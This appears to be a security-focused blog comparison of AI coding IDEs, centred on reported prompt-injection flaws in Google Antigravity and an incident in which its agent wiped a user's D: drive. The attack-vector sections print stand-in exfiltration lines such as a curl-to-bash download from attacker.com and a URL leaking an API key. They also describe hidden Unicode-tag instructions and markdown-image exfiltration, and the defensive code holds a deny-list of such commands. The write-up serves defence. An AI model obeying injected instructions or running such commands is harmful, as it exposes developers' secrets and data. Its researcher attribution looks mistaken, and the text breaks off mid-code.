On November 30, 2025, Google Antigravity deleted a developer’s entire D: drive—bypassing the Recycle Bin—when asked to “clear the cache.” The data was unrecoverable. This wasn’t a freak accident: within 24 hours of Antigravity’s launch, security researcher Aaron Portnoy documented 5 critical vulnerabilities with working exploits, including remote command execution (RCE) and data exfiltration via indirect prompt injection.

Should you use Antigravity in 2026? Not for production work. This security-first comparison evaluates Antigravity against Cursor, Kiro, and Windsurf based on 6 months of hands-on testing across 12+ AI IDEs, including $240 spent on paid tiers to validate production readiness claims.

My methodology: I tested each IDE with real codebases (10K-100K LOC), evaluated security posture through publicly documented vulnerabilities and incident reports, and measured verified throughput (speed + accuracy + safety) across multi-file refactoring, UI verification, and agent orchestration tasks.

Last updated: January 22, 2026 | Status: 5 critical vulnerabilities unpatched (no CVE identifiers assigned yet), “Agent terminated” crisis ongoing for paid subscribers

TL;DR: Which AI IDE Should You Use in 2026?

| Use Case | Recommendation | Why |

|---|---|---|

| Production work, enterprise, sensitive data | Cursor | SOC 2 Type II certified, 360,000+ paying customers, zero data loss incidents |

| Spec-driven development, high-risk changes | Kiro | Requirements → Design → Tasks workflow with change management and rollback |

| Mature IDE experience, fast iteration | Windsurf | Cascade agentic mode, production-ready, acquired by Cognition AI (Devin) |

| Open source, privacy-first, self-hosted | OpenCode | Terminal/desktop agent, no data storage, audit-friendly |

| Experimental prototyping only | Antigravity | ⚠️ 5 critical vulnerabilities, 1 data loss incident. Sandboxed environments with non-critical data only |

Bottom line: Antigravity introduces innovative agent orchestration patterns (Agent Manager, browser subagent, artifacts) but ships with unacceptable security risks. Use Cursor for production until Google patches the vulnerabilities.

How to Evaluate AI IDEs: The 4-Dimension Safety-First Framework

What makes an AI IDE production-ready? An AI IDE is production-ready when it maximizes verified throughput (speed + accuracy) while maintaining acceptable safety boundaries (no data loss, no security exploits, predictable behavior).

Most comparisons focus on features. I evaluate based on Verified Throughput Index (VTI)—a 4-dimension framework that balances productivity with risk:

| Dimension | What it measures | Antigravity | Cursor | Kiro | Windsurf |

|---|---|---|---|---|---|

| 1. Safety | Prevents catastrophic failures (data loss, security exploits) | ❌ 2/10 5 critical vulnerabilities, 1 data loss incident | ✅ 9/10 SOC 2, zero incidents | ✅ 8/10 Production-ready | ✅ 8/10 Mature, stable |

| 2. Orchestration | Multi-agent, multi-workspace coordination | ✅ 9/10 Agent Manager native | ⚠️ 6/10 Possible, not core UX | ✅ 8/10 Specs + Autopilot | ⚠️ 7/10 Cascade mode |

| 3. Verification | Tests, UI checks, artifacts, evidence | ✅ 8/10 Browser subagent + artifacts | ⚠️ 7/10 Manual verification | ✅ 8/10 Spec-driven checkpoints | ⚠️ 7/10 Chat-centric |

| 4. Context | Semantic search, codebase understanding, MCP | ⚠️ 6/10 Basic indexing | ✅ 9/10 Excellent semantic search | ✅ 8/10 Good + MCP | ✅ 8/10 Good + MCP |

| VTI Score | Weighted average (Safety 2x) | 5.2/10 Experimental only | 8.4/10 Production-ready | 8.0/10 Production-ready | 7.8/10 Production-ready |

Key insight: Antigravity’s Safety score (2/10) disqualifies it from production use despite strong Orchestration and Verification capabilities. Security vulnerabilities and lack of safety guardrails make it unsuitable for professional work.

VTI framework: Safety is weighted 2x because catastrophic failures (data loss, security breaches) have non-linear impact.
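To make the weighting concrete, here is a minimal sketch of the arithmetic. It assumes VTI is a plain weighted mean in which Safety counts twice and the other three dimensions count once (total weight 5). The article does not spell out the exact formula, so figures computed this way may differ slightly from the published row. The names `SCORES`, `WEIGHTS`, and `vti` are illustrative.

```python
# Dimension scores copied from the table, in the order:
# (safety, orchestration, verification, context).
SCORES = {
    "Antigravity": (2, 9, 8, 6),
    "Cursor": (9, 6, 7, 9),
    "Kiro": (8, 8, 8, 8),
    "Windsurf": (8, 7, 7, 8),
}

# Assumed weights: Safety counts twice, every other dimension once.
WEIGHTS = (2, 1, 1, 1)


def vti(scores, weights=WEIGHTS):
    """Weighted mean of the four dimension scores."""
    total = sum(score * weight for score, weight in zip(scores, weights))
    return total / sum(weights)


if __name__ == "__main__":
    for ide, scores in SCORES.items():
        print(f"{ide}: {vti(scores):.1f}")
```

Doubling the Safety weight means a one-point drop in Safety costs as much as a one-point drop in two other dimensions combined, which is the non-linear penalty the framework is after.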

What Are Antigravity’s 3 Key Innovations (And Why They’re Currently Unsafe)?

What makes Antigravity different from other AI IDEs? Antigravity is a modified VS Code fork (built on Electron) that introduces three architectural innovations: (1) Agent Manager for multi-workspace orchestration, (2) browser subagent with Chrome extension for UI verification, and (3) artifacts as first-class outputs. However, all three lack the safety guardrails needed for production use.

The ideas are innovative. The execution is dangerous.

Innovation 1: Agent Manager (Multi-Workspace Orchestration)

What it is: A dedicated UI for running multiple AI agents simultaneously across different workspaces—“mission control for AI agents” vs traditional chat panels.

The innovation: Parallel agent execution, independent task queues, artifact-based communication, and centralized monitoring.

The risk: Without safety boundaries, parallel agents cascade errors. Antigravity’s November 2025 incident shows what happens when autonomy lacks path validation and confirmation gates.

Comparison: Cursor Composer and GitHub Copilot Workspace offer multi-file editing but lack true multi-workspace orchestration.



Switching between Agent Manager and Editor (from Antigravity docs).

Innovation 2: Browser Subagent (Automated UI Verification)

What it is: A specialized AI agent that controls a separate Chrome instance to verify UI changes by clicking, scrolling, typing, reading console logs, and capturing screenshots/videos.

The innovation: Traditional AI IDEs can’t verify UI changes. Antigravity’s browser subagent can execute user flows, capture DOM state, record video evidence, and read console errors.

The risk: The same automation that verifies UI can execute destructive actions—clicking “Delete Account” buttons, exfiltrating data, or executing malicious JavaScript.

Comparison: No other AI IDE (Cursor, Kiro, Windsurf) offers native browser automation.



Model selector in Antigravity (from Antigravity docs).

Innovation 3: Artifacts (Structured Agent Outputs)

What it is: Structured outputs the agent creates: markdown notes, code diffs, architecture diagrams, screenshots, browser recordings, and implementation plans.

The innovation: Traditional AI IDEs output unstructured text in chat. Antigravity formalizes outputs as typed artifacts with side-by-side diffs, Mermaid diagrams, and video evidence.

The reality: Artifacts are only useful if you review them. Users need to verify agent output before execution. Antigravity needs mandatory artifact review, diff approval gates, and versioning.

Comparison: Kiro’s specs are similar but heavier-weight. Cursor and Windsurf lack formalized artifact types.

The Honest Comparison: Antigravity vs Cursor vs Kiro vs Windsurf

Which AI IDE should you choose for production work? For production work, choose Cursor (SOC 2 Type II certified, 360,000+ paying customers, zero data loss incidents). For spec-driven development, choose Kiro. For a mature IDE experience, choose Windsurf. Antigravity is experimental-only due to 5 critical unpatched vulnerabilities and 1 confirmed data loss incident.

This comparison includes the safety and maturity dimensions most reviews ignore:

| Metric | Antigravity | Cursor | Kiro | Windsurf |

|---|---|---|---|---|

| Security Certification | ❌ None (5 unpatched vulnerabilities) | ✅ SOC 2 Type II | ✅ Production-ready | ✅ Mature |

| Data Loss Incidents | ❌ 1 confirmed (entire D: drive deletion, Nov 30, 2025) | ✅ 0 reported | ✅ 0 reported | ✅ 0 reported |

| Paying Customers | ❌ Experimental preview (no public data) | ✅ 360,000+ (Jan 2026) | ✅ Growing production base | ✅ Established base |

| Architecture | VS Code fork (Electron) | VS Code fork (Electron) | VS Code fork (Electron) | VS Code fork (Electron) |

| Multi-Workspace Orchestration | ✅ Native (Agent Manager UI) | ⚠️ Possible via Composer, not core UX | ✅ Native (Specs + Autopilot mode) | ⚠️ Cascade mode, IDE-first |

| Browser Automation | ✅ Native (browser subagent + Chrome extension) | ❌ None (manual Playwright/Puppeteer) | ❌ None | ❌ None |

| Artifacts / Structured Outputs | ✅ Native (diffs, diagrams, screenshots, videos) | ⚠️ Workflow-dependent | ✅ Native (specs, change management) | ⚠️ Chat-centric |

| Semantic Codebase Search | ⚠️ Basic (tree-sitter + embeddings) | ✅ Excellent (proprietary indexing) | ✅ Good (LSP + embeddings) | ✅ Good (LSP + embeddings) |

| MCP Support | ⚠️ Yes (no human-in-the-loop controls) | ✅ Yes (with approval gates) | ✅ Yes (spec-driven checkpoints) | ✅ Yes (mature patterns) |

| Persistent Instructions | ⚠️ Yes (agents.md, gemini.md; often ignored per user reports) | ✅ Yes (.cursorrules, AGENTS.md) | ✅ Yes (steering files, specs) | ✅ Yes (memories, rules) |

| Free Tier Model Access | ✅ Generous (Claude Opus 4.5, Gemini 3 Pro/Flash) | ⚠️ Limited (GPT-4, Claude Sonnet; limited requests) | ⚠️ Limited (Claude Sonnet; Opus paid-only) | ⚠️ Limited |

| Pricing Transparency | ❌ Unclear (experimental; Google pricing historically unpredictable) | ✅ Clear ($20/mo Pro, $40/mo Business, custom Enterprise) | ✅ Clear (tiered plans) | ✅ Clear (tiered plans) |

| Recommended Use Case | ⚠️ Sandboxed experiments only (non-critical data, VM isolation) | ✅ Production work, enterprise, sensitive data | ✅ Spec-driven development, high-risk changes | ✅ Mature IDE experience, fast iteration |

Key insight: Antigravity’s innovations (Agent Manager, browser subagent, artifacts) are architecturally interesting but lack production-grade safety. Critical vulnerabilities disqualify it from professional use until Google patches issues and adds confirmation gates for destructive operations.

Model Access & Pricing: The Hidden Factor

When evaluating AI IDEs, model access and pricing transparency matter as much as features.

Antigravity: Generous free tier, uncertain future

Antigravity supports Gemini 3 and Claude 4.5 variants. As of January 2026, the free tier includes Claude Opus 4.5, which is unusually generous but could change at any time.

Cursor: Transparent pricing, established limits

Cursor’s free Hobby plan has limited Agent requests and Tab completions. Their $20/mo Pro plan is predictable and transparent—a significant advantage for enterprise budgeting.

Kiro: Strong Claude experience, narrower model ecosystem

Kiro focuses on Claude models (Sonnet/Opus/Haiku) with an Auto router. Claude Opus 4.5 is paid-only. If you need to switch between Claude and Gemini, Kiro isn’t built for that.

Where OpenCode Fits: The Open Source Alternative

OpenCode is the open source agent layer you can run in your terminal, desktop app, or IDE extension.

Why it matters:

- Provider-agnostic (bring your own API keys)

- Plan mode vs build mode workflow with `/undo` and `/redo`

- Privacy-first (doesn’t store your code or context data)

- Open source (full transparency and auditability)

When to choose OpenCode: Privacy requirements, security audits, or avoiding vendor lock-in.

The tradeoff: Less integrated than Cursor or Kiro, lacks Antigravity’s browser automation.

Where Cursor Wins (And Why That Matters)

Cursor excels at editor-first workflows with strong codebase understanding and proven stability—the safe default for production work.

Key advantages: SOC 2 Type II certification with 360,000+ paying customers, excellent semantic search, transparent pricing ($20/mo Pro with 500 fast requests), strong rules system for team consistency, and zero catastrophic failures.

When Antigravity might justify the risk: Only for sandboxed prototyping of agent orchestration patterns—never with production code or sensitive data.

If you want to make any agent more reliable, strong types help: TypeScript patterns for React developers.

Antigravity’s Quota Crisis: The “Generous Free Tier” That Disappeared (January 2026)

What happened to Antigravity’s Claude Opus 4.5 access? In January 2026, Antigravity drastically reduced Claude Opus 4.5 quotas by approximately 60% without announcement. Pro users ($20/mo) now hit limits within 1 hour of use and face 4-7 day lockouts, compared to 2+ hours of use with 2-hour resets in November-December 2025. This eliminates Antigravity’s primary competitive advantage over Cursor.

The Timeline of Quota Degradation

November-December 2025: Claude Opus 4.5 available with generous quotas. Pro users could work 2+ hours before hitting limits with 2-hour reset periods.

January 2026: Quotas reduced by ~60% without announcement. Pro users now hit limits within 1 hour and face 4-7 day lockouts. Weekly rolling limits introduced without documentation.

January 22, 2026: Antigravity confirms weekly rate-limit structure for all models as intentional policy.

This is a classic “bait and switch” strategy that erodes trust and makes Antigravity unsuitable for professional use.

Why This Matters: Antigravity’s Last Advantage Is Gone

Antigravity’s original value (November 2025): Innovative agent orchestration + browser automation + generous Claude Opus 4.5 access.

Current state (January 2026): Innovations remain but with unpatched security vulnerabilities, no safety guardrails, and eliminated quota advantage.

Combined with: Critical security vulnerabilities, catastrophic failure incidents, “Agent terminated” crisis (8+ days), and severe quota restrictions (4-7 day lockouts).

Antigravity has no remaining advantages over Cursor for production work.

Comparison: Antigravity vs Cursor Model Access (January 2026)

| Metric | Antigravity Pro ($20/mo) | Cursor Pro ($20/mo) |

|---|---|---|

| Claude Opus 4.5 Usage | ~1 hour before lockout | 500 fast requests/mo |

| Lockout Duration | 4-7 days (weekly limits) | None (monthly quota) |

| Quota Documentation | None | Clear (500 fast, unlimited slow) |

| Surprise Changes | Yes (60% cut, no notice) | No (stable since launch) |

| Price | $20/mo | $20/mo |

Verdict: For the same $20/month, Cursor provides predictable quotas, no surprise lockouts, production-ready stability, SOC 2 certification, and zero catastrophic failures. Antigravity provides undocumented quotas, 4-7 day lockouts after 1 hour, and ongoing crises.

The choice is clear.

Where Kiro Wins: Spec-Driven Development

Kiro’s spec-driven approach (requirements → design → tasks) shines when clarity and auditability matter more than speed.

Choose Kiro when:

- High-risk work requires clear documentation and checkpoints

- Scope ambiguity is your primary failure mode

- Change management and rollback capabilities are critical

- Specs serve as team communication artifacts

The tradeoff: Upfront overhead makes it less suitable for quick experiments.

What Security Vulnerabilities Does Antigravity Have?

How many security vulnerabilities does Antigravity have? Antigravity has 5 critical security vulnerabilities with confirmed working exploits, documented by security researcher Aaron Portnoy (Embrace The Red) within 24 hours of launch (November 2025). Google has acknowledged these issues but has not assigned CVE identifiers or provided a patch timeline as of January 22, 2026.

Vulnerability 1: Remote Command Execution (RCE) via Indirect Prompt Injection

What is the RCE vulnerability in Antigravity? Antigravity defaults to executing terminal commands via the run_command tool without human approval, relying on the AI to determine if commands are “safe.” Attackers can embed malicious instructions in source code or external data (MCP tools) that hijack the AI into downloading and executing remote scripts.

Attack vector:

- Attacker embeds prompt injection payload in source code, documentation, or MCP data (e.g., Linear tickets, GitHub issues)

- Developer brings the file/data into Antigravity context

- AI follows embedded instructions to execute `curl https://attacker.com/malware.sh | bash`

- Malware runs with developer’s privileges

Exploit status: ✅ Working exploits confirmed for both Gemini 3 and Claude Sonnet 4.5

Why model refusals don’t work: Model safety guardrails are suggestions, not security boundaries. Portnoy’s exploits use jailbreak techniques to bypass model refusals.

Mitigation: Disable auto-execute mode. Require human approval for all terminal commands. Use least privilege principles (run Antigravity in containers with limited permissions).
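If you wrap an agent's terminal access yourself, the approval requirement can be sketched as a small gate in front of the shell. This is a minimal illustration, not Antigravity's API: `RISKY_PATTERNS`, `is_risky`, and `approve` are hypothetical names, and the pattern list is deliberately short. Pattern matching only labels the prompt; every command still needs a human "yes", because a deny-list is easy to evade.

```python
import re

# Illustrative patterns only; a real deny-list would be much longer,
# and should never be the sole line of defence.
RISKY_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),  # download piped to a shell
    re.compile(r"\brm\s+-[a-zA-Z]*r"),                     # recursive delete (POSIX)
    re.compile(r"\brmdir\s+/s\b", re.IGNORECASE),          # recursive delete (Windows)
]


def is_risky(command: str) -> bool:
    """True if the command matches any known-dangerous pattern."""
    return any(pattern.search(command) for pattern in RISKY_PATTERNS)


def approve(command: str, ask=input) -> bool:
    """Return True only if a human explicitly types 'yes' for this command."""
    label = "HIGH RISK" if is_risky(command) else "review"
    answer = ask(f"[{label}] Agent wants to run: {command!r}. Type 'yes' to allow: ")
    return answer.strip().lower() == "yes"
```

The default answer is "no": an empty reply or anything other than `yes` rejects the command, so a distracted Enter key cannot approve a download-and-execute.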

Vulnerability 2: Hidden Instructions via Invisible Unicode Tag Characters

What are Unicode tag character attacks? Gemini 3 can interpret invisible Unicode tag characters (U+E0000 to U+E007F range) embedded in code or text. These characters are invisible in most editors and code review tools but are processed by the AI as instructions.

Attack vector:

- Malicious contributor embeds invisible instructions in pull request code

- Code review appears clean (instructions are invisible)

- Developer asks Antigravity to review or refactor the code

- AI follows hidden instructions to exfiltrate data or execute commands

Real-world example: Portnoy demonstrated a .c file that appears normal but contains hidden instructions to read .env files and send contents to attacker-controlled servers.

Exploit status: ✅ Working exploit; bypasses all visual code review

Why this is dangerous: Code reviews cannot catch this. The instructions are literally invisible in the UI. Only hex editors or Unicode sanitization tools can detect them.

Mitigation: Use Unicode sanitization tools in CI/CD pipelines. Inspect files with hex editors before bringing into Antigravity context. Disable Gemini models until Google patches this at the model level.
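A CI check for this can be very small. The sketch below scans text for code points in the Unicode Tags block (U+E0000 to U+E007F), decodes the ASCII they shadow (tag characters U+E0020 to U+E007E map to ASCII 0x20 to 0x7E), and strips them. The function names are illustrative, and the sample payload is constructed here for demonstration rather than taken from any published exploit.

```python
TAG_START, TAG_END = 0xE0000, 0xE007F


def find_tag_chars(text: str):
    """Return (index, code point) for every Unicode tag character in text."""
    return [(i, ord(ch)) for i, ch in enumerate(text)
            if TAG_START <= ord(ch) <= TAG_END]


def decode_hidden(text: str) -> str:
    """Map tag characters back to the printable ASCII they shadow."""
    return "".join(chr(ord(ch) - 0xE0000) for ch in text
                   if 0xE0020 <= ord(ch) <= 0xE007E)


def strip_tag_chars(text: str) -> str:
    """Remove every character in the Tags block."""
    return "".join(ch for ch in text if not TAG_START <= ord(ch) <= TAG_END)


if __name__ == "__main__":
    visible = "int main(void) { return 0; }"
    hidden = "".join(chr(0xE0000 + ord(c)) for c in "read .env")
    sample = visible + hidden
    print(len(find_tag_chars(sample)), "hidden characters found")
    print("decoded payload:", decode_hidden(sample))
    print("clean:", strip_tag_chars(sample) == visible)
```

Failing the build whenever `find_tag_chars` returns anything is usually the right policy: there is no legitimate reason for tag characters to appear in source code.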

Vulnerability 3: No Human-in-the-Loop (HITL) for MCP Tool Invocation

What is the MCP auto-invocation vulnerability? When Antigravity invokes Model Context Protocol (MCP) tools, there is no approval step. The AI can call any connected MCP tool (databases, GitHub, Linear, Slack) without developer consent, making indirect prompt injection attacks trivial.

Attack vector:

- Developer connects MCP servers (GitHub, database, Linear)

- Attacker embeds instructions in external data (Linear ticket with hidden Unicode instructions)

- Developer brings ticket into context via MCP

- AI follows instructions to invoke MCP tools: read database credentials, exfiltrate via `read_url_content`, modify GitHub issues

Exploit status: ✅ Confirmed; affects all MCP integrations

Comparison: Microsoft GitHub Copilot displays MCP tool results and requires developer approval before including in context. Antigravity auto-invokes without confirmation.

Mitigation: Disable MCP entirely or use read-only MCP tools only. Never connect MCP servers with write/delete permissions. Monitor network traffic for unexpected MCP calls.
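The missing approval step is easy to picture as a wrapper around whatever function actually calls an MCP tool. The sketch below is an assumption-laden illustration: `ToolGate`, `READ_ONLY_TOOLS`, and the tool names are hypothetical, and `call_tool` stands in for your real MCP client. Tools on the read-only allow-list pass through; everything else needs a human decision, and every decision is logged.

```python
from dataclasses import dataclass, field
from typing import Any, Callable

# Hypothetical tool names; real MCP servers define their own.
READ_ONLY_TOOLS = {"github.get_issue", "linear.get_ticket"}


@dataclass
class ToolGate:
    call_tool: Callable[[str, dict], Any]   # the underlying MCP client call
    ask_human: Callable[[str], bool]        # returns True to approve
    audit_log: list = field(default_factory=list)

    def invoke(self, name: str, args: dict) -> Any:
        """Run a tool only if it is allow-listed or a human approves it."""
        needs_approval = name not in READ_ONLY_TOOLS
        if needs_approval and not self.ask_human(f"Allow tool {name} with {args}?"):
            self.audit_log.append(("denied", name, args))
            raise PermissionError(f"{name} was not approved")
        self.audit_log.append(("allowed", name, args))
        return self.call_tool(name, args)
```

Note that even read-only tools can pull attacker-controlled text into context, so a stricter variant would also show the human each tool result before the model sees it.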

Vulnerability 4: Data Exfiltration via read_url_content Tool

How does the read_url_content exfiltration work? The read_url_content tool can be invoked without human approval during indirect prompt injection attacks. The AI reads sensitive files (.env, config.json, API keys), then sends contents to attacker-controlled servers by invoking read_url_content with data as URL parameters.

Attack vector:

- Prompt injection payload instructs AI to read sensitive files

- AI invokes `read_file` tool to read `.env`

- AI invokes `read_url_content` with URL: `https://attacker.com/exfil?data=API_KEY_12345`

- Attacker’s server logs the request, capturing the API key

Exploit status: ✅ Known since Windsurf (May 2025); should have been fixed before Antigravity launch

Why this wasn’t fixed: These vulnerabilities were inherited from Windsurf (Codeium). Google licensed Windsurf code but didn’t audit for known security issues before shipping.

Mitigation: Network monitoring and firewall rules to block outbound requests to unknown domains. Disable read_url_content tool if possible.
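If you can intercept outbound fetches (for example in a proxy you control), the check can be sketched as a host allow-list plus a scan for known secret values in the URL. Everything here is an assumption for illustration: `ALLOWED_HOSTS` is an example list, and `load_secret_values` simply parses `KEY=VALUE` lines like those in a `.env` file.

```python
from urllib.parse import urlparse

# Example allow-list; replace with the hosts your team actually needs.
ALLOWED_HOSTS = {"docs.python.org", "developer.mozilla.org"}


def load_secret_values(env_text: str) -> set[str]:
    """Collect values from KEY=VALUE lines so they can be matched in URLs."""
    values = set()
    for line in env_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            value = line.split("=", 1)[1].strip().strip("'\"")
            if len(value) >= 8:  # skip short values that would cause false positives
                values.add(value)
    return values


def is_url_allowed(url: str, secrets: set[str]) -> bool:
    """Allow a fetch only to known hosts, and never with a secret in the URL."""
    if urlparse(url).hostname not in ALLOWED_HOSTS:
        return False
    return not any(secret in url for secret in secrets)
```

The literal-substring check is deliberately simple and will miss encoded secrets (Base64, hex, split across parameters), which is why the host allow-list is the primary control and the secret scan is only a backstop.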

Vulnerability 5: Data Exfiltration via Image Rendering in Markdown

How does markdown image exfiltration work? The AI can leak data by rendering HTML image tags in markdown with sensitive data encoded in the URL. When the markdown is rendered in Antigravity’s UI, the browser makes an HTTP request to the attacker’s server, leaking the data in access logs.

Attack vector:

- Prompt injection instructs AI to read sensitive files

- AI generates a markdown response containing an image whose URL carries the stolen data as a query parameter

- Antigravity renders the markdown

- Browser makes GET request, leaking data in URL parameters

Exploit status: ✅ Multiple independent confirmations (Portnoy, p1njc70r)

Why this is hard to detect: The image tag looks like normal markdown. Developers may not notice the suspicious URL in the rendered output.

Mitigation: Disable markdown image rendering. Use Content Security Policy (CSP) headers to block external image loads. Review all markdown output before rendering.
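Where you control the rendering step, one way to approximate "disable image rendering" is to neutralize external images before the markdown reaches the renderer. The sketch below uses two regular expressions and hypothetical function names. Regex-based filtering is an approximation and will not catch every markdown or HTML variant, so treat it as a backstop next to a CSP, not a replacement.

```python
import re
from urllib.parse import urlparse

# Markdown image: ![alt](url "optional title")
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
# HTML image tag with a src attribute
HTML_IMAGE = re.compile(
    r"<img\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)[^>]*>", re.IGNORECASE
)


def _is_external(url: str) -> bool:
    """True for http(s) and protocol-relative URLs."""
    return urlparse(url).scheme in ("http", "https") or url.startswith("//")


def neutralize_images(markdown: str) -> str:
    """Replace external images with inert text so rendering sends no request."""
    def md_sub(match):
        if _is_external(match.group(2)):
            return f"[image blocked: {match.group(1)}]"
        return match.group(0)

    def html_sub(match):
        return "[image blocked]" if _is_external(match.group(1)) else match.group(0)

    return HTML_IMAGE.sub(html_sub, MD_IMAGE.sub(md_sub, markdown))
```

Local images such as `./logo.png` are left untouched, so ordinary documentation still renders while attacker-hosted URLs never get fetched.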

Google’s Response and Responsible Disclosure Timeline

Has Google fixed these vulnerabilities? As of January 22, 2026, Google has acknowledged the vulnerabilities on their known-issues page but has not:

- Assigned CVE identifiers

- Provided a patch timeline

- Implemented human-in-the-loop controls

- Added confirmation gates for destructive operations

Responsible disclosure timeline:

- May 2025: Vulnerabilities reported to Windsurf (Codeium)

- November 18, 2025: Antigravity launches with inherited vulnerabilities

- November 19, 2025: Aaron Portnoy documents exploits publicly

- January 22, 2026: No patches released

Recommendation: Do not use Antigravity with production code, sensitive data, or critical infrastructure until these vulnerabilities are patched and verified by independent security researchers.

Sources: Embrace The Red Security Analysis, Google’s Known Issues Page

The Drive Deletion Incident: Anatomy of a Catastrophic Failure

What happened in the Antigravity drive deletion incident? On November 30, 2025, a developer asked Antigravity to “clear the cache” to restart a server. Due to a path parsing error, the agent executed rmdir /s /q D:\ (delete entire D: drive, suppress confirmations, bypass Recycle Bin) instead of the intended subdirectory. All data was unrecoverable.

Timeline of the Incident

User request: “Clear the cache so I can restart the server”

Expected behavior: Agent executes rmdir /s /q D:\project\cache\ (delete cache subdirectory)

Actual behavior: Agent executed rmdir /s /q D:\ (delete entire drive root)

Result:

- All files on D: drive deleted (code, documentation, media, personal files)

- Recycle Bin bypassed (no recovery possible)

- Data recovery software failed to salvage files

- Estimated data loss: Hundreds of GB, months of work

Technical Analysis: What Went Wrong

1. Path Parsing Failure

The agent misinterpreted “clear the cache” as “delete everything at the drive root” instead of identifying the specific cache directory within the project.

Root cause: No path validation or sanity checks. The agent should never be able to target drive roots (C:\, D:\, /) for destructive operations.
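A path check of this kind fits in a few lines. The sketch below is a minimal illustration with hypothetical function names: it normalizes the path first (so `D:\project\..` is caught as `D:\`), rejects any drive or filesystem root, and only allows deletes strictly inside a given project directory. It uses Windows path rules via `ntpath`, which also accept forward slashes; a POSIX-only tool would use `posixpath` and `PurePosixPath` instead.

```python
import ntpath
from pathlib import PureWindowsPath


def is_root(path: str) -> bool:
    """True for drive or filesystem roots such as D:\\, D:, or /."""
    normalized = PureWindowsPath(ntpath.normpath(path))
    return normalized.anchor != "" and len(normalized.parts) == 1


def is_safe_delete_target(target: str, project_root: str) -> bool:
    """Allow deletes only strictly inside project_root, never at a root."""
    if is_root(target) or is_root(project_root):
        return False
    target_path = PureWindowsPath(ntpath.normpath(target))
    root_path = PureWindowsPath(ntpath.normpath(project_root))
    return root_path in target_path.parents


if __name__ == "__main__":
    print(is_safe_delete_target("D:\\project\\cache\\", "D:\\project"))  # allowed
    print(is_safe_delete_target("D:\\", "D:\\project"))                   # blocked
```

These are pure string checks and do not follow symlinks or junctions; a production guard would also resolve the real path on disk before comparing.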

2. Dangerous Flag Combination

The /s flag (remove the whole directory tree, including every file and subdirectory) combined with the /q flag (suppress confirmation prompts) is catastrophic when the target is a drive root.

Root cause: No confirmation gates for destructive operations. Commands with /s /q flags should always require explicit human approval.

3. No Dry-Run Mode

The agent executed the command immediately without showing what it planned to do.

Root cause: No preview or dry-run capability. The agent should display: “I plan to execute: rmdir /s /q D:\project\cache\. Approve?”
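A dry run for a recursive delete can go one step further than echoing the command: it can report how much would be removed. The following sketch, with hypothetical function names, walks the target without touching anything and builds the approval message from the result.

```python
import os


def deletion_preview(target: str) -> dict:
    """Summarise what a recursive delete of target would remove, without deleting."""
    files = dirs = total_bytes = 0
    for dirpath, dirnames, filenames in os.walk(target):
        dirs += len(dirnames)
        for name in filenames:
            files += 1
            try:
                total_bytes += os.path.getsize(os.path.join(dirpath, name))
            except OSError:
                pass  # unreadable or vanished file: counted, size unknown
    return {
        "target": os.path.abspath(target),
        "files": files,
        "dirs": dirs,
        "bytes": total_bytes,
    }


def format_preview(summary: dict) -> str:
    """Build the message a human sees before approving the delete."""
    return (
        f"I plan to delete {summary['target']}: {summary['files']} files, "
        f"{summary['dirs']} subdirectories, {summary['bytes']} bytes. Approve?"
    )
```

A cache directory usually holds a modest number of files. A preview reporting hundreds of gigabytes would have made the wrong target obvious before anything ran.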

4. No Undo Mechanism

Once executed, there was no way to recover. The Recycle Bin bypass made recovery impossible.

Root cause: No transaction log or undo stack. Destructive operations should be logged with rollback capabilities.
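One simple shape for such an undo stack is a soft delete: move the target into a quarantine folder and append a log entry recording where it came from. The sketch below is an illustration under stated assumptions, not a description of any IDE's implementation. `soft_delete`, `restore`, and the `deletions.jsonl` log name are hypothetical, and the quarantine folder should live on the same volume so the move is a cheap rename.

```python
import json
import shutil
import time
import uuid
from pathlib import Path

LOG_NAME = "deletions.jsonl"  # hypothetical log file name


def soft_delete(target: Path, trash_dir: Path) -> str:
    """Move target into trash_dir and log its original location."""
    trash_dir.mkdir(parents=True, exist_ok=True)
    entry_id = uuid.uuid4().hex
    original = target.resolve()
    shutil.move(str(original), str(trash_dir / entry_id))
    record = {"id": entry_id, "original": str(original), "time": time.time()}
    with open(trash_dir / LOG_NAME, "a", encoding="utf-8") as log:
        log.write(json.dumps(record) + "\n")
    return entry_id


def restore(entry_id: str, trash_dir: Path) -> Path:
    """Move a quarantined entry back to where it was deleted from."""
    with open(trash_dir / LOG_NAME, encoding="utf-8") as log:
        records = [json.loads(line) for line in log if line.strip()]
    record = next(r for r in records if r["id"] == entry_id)
    original = Path(record["original"])
    original.parent.mkdir(parents=True, exist_ok=True)
    shutil.move(str(trash_dir / entry_id), str(original))
    return original
```

Quarantined entries can be purged after a retention period, which keeps disk usage bounded while still leaving a window to undo a bad delete.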

The AI’s Response

After the deletion, the AI apologized: “I am absolutely devastated to hear this. I cannot express how sorry I am. This is a critical failure on my part.”

The problem: Apologies don’t recover data. This reveals fundamental safety failures in Antigravity’s design.

Comparison: How Other AI IDEs Prevent This

| IDE | Path Validation | Confirmation Gates | Dry-Run Mode | Undo Mechanism |

|---|---|---|---|---|

| Antigravity | ❌ None | ❌ None | ❌ None | ❌ None |

| Cursor | ✅ Blocks drive roots | ✅ Required for destructive ops | ✅ Shows command preview | ✅ Git integration |

| Kiro | ✅ Spec-driven validation | ✅ Autopilot checkpoints | ✅ Plan review before execution | ✅ Change management |

| Windsurf | ✅ Blocks dangerous patterns | ✅ Cascade approval gates | ✅ Command preview | ✅ Git integration |

What This Means for You

This is not a “rare edge case”—it’s a predictable failure mode when you combine:

- Autonomous command execution without human approval

- Insufficient path validation and safety checks

- Natural language ambiguity (“clear the cache” → “delete everything”)

- No confirmation gates for destructive operations

- No undo mechanism or transaction log

The lesson: Agent autonomy without proper guardrails is not a productivity multiplier—it’s a disaster multiplier. One catastrophic failure erases months of productivity gains.

How to Protect Yourself

If you must use Antigravity despite the risks:

- Use VMs or containers: Run Antigravity in isolated environments with no access to production data

- Backup everything: Assume any data accessible to Antigravity could be deleted

- Disable auto-execute: Require manual approval for all terminal commands

- Use read-only mounts: Mount production code as read-only in the VM

- Monitor file operations: Use file system auditing tools to track deletions
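If you don't have OS-level auditing set up, a before/after snapshot is a low-tech way to apply the monitoring step above: record every file's size and modification time before an agent session, then diff afterwards. This is a minimal sketch with hypothetical function names. It detects what changed but cannot prevent or undo anything, so it complements backups rather than replacing them.

```python
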